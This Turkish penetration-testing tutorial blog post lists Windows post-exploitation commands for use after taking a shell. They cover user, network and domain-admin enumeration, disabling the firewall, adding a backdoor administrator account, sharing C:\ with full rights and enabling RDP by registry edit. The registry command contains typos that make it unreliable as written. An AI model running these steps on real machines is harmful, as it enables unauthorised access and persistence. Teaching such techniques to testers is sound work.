5 Nisan 2017 Çarşamba

Sızma Testi 101 - Windows Erişim Sonrası Komutları (1)


Bir sistem üzerinde shell almak her zaman bütün sorunlarımıza çözüm olmayabilir. Özellikle de yönetici yetkimiz yoksa. Bu bölümde Windows erişim sonrası komutlarına giriş yapacağız.

Ele geçirdiğimiz makine bir Windows ise ve üzerine meterpreter gibi bir RAT yükleyemediysek veya buna gerek görmediysek, aşağıdaki gibi komutları kullanarak hala birçok şey yapabiliriz.

Öncelikle, ele geçirdiğimiz bilgisayarın kullanıcılarını ve bilgilerini görüntüleyebiliriz:

whoami /all

Bulunduğumuz dizinin öğelerini görmek için, Linux ls komutunun yerine:

dir

Ağ ayarlarını görüntülemek için:

ipconfig /all

DNS ayarlarını görüntülemek için:

ipconfig /displaydns

Arp tablosunu görüntülemek için:

arp -a

Routing tablosunu görntülemek için:

route print

Makinenin parola kurallarını görntülemek için:

net accounts

Domain kullanıcılarını görüntülemek için:

net user /domain

Domain adminleri öğrenmek için:

net group “Domain Admins” /domain

Firewall'ı devre dışı bırakmak için:

netsh firewall set opmode disable

İşimiz bittiğinde tekrar devreye sokmak için:

netsh firewall set opmode enable

Makineye yeni kullanıcı eklemek için:

net user kullanıcı /add

Kullanıcıya yetki vermek için:

net localgroup administrators /add kullanıcı

ve

net share ornek$=C:\ /grant:kullanıcı,FULL /unlimited

Şimdi ise işleri biraz daha eğlenceli kılmak için makine üzerinde RDP hizmetini etkinleştirebiliriz:

reg add"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /tREG_DWORD /d 0 /f 

Artık açtığımız yeni kullanıcı ve uzak masaüstü ile karşıdaki bilgisayara bağlanabiliriz. Devamı yolda...
on 05 Nisan by Berk Cem Göksel |   Edit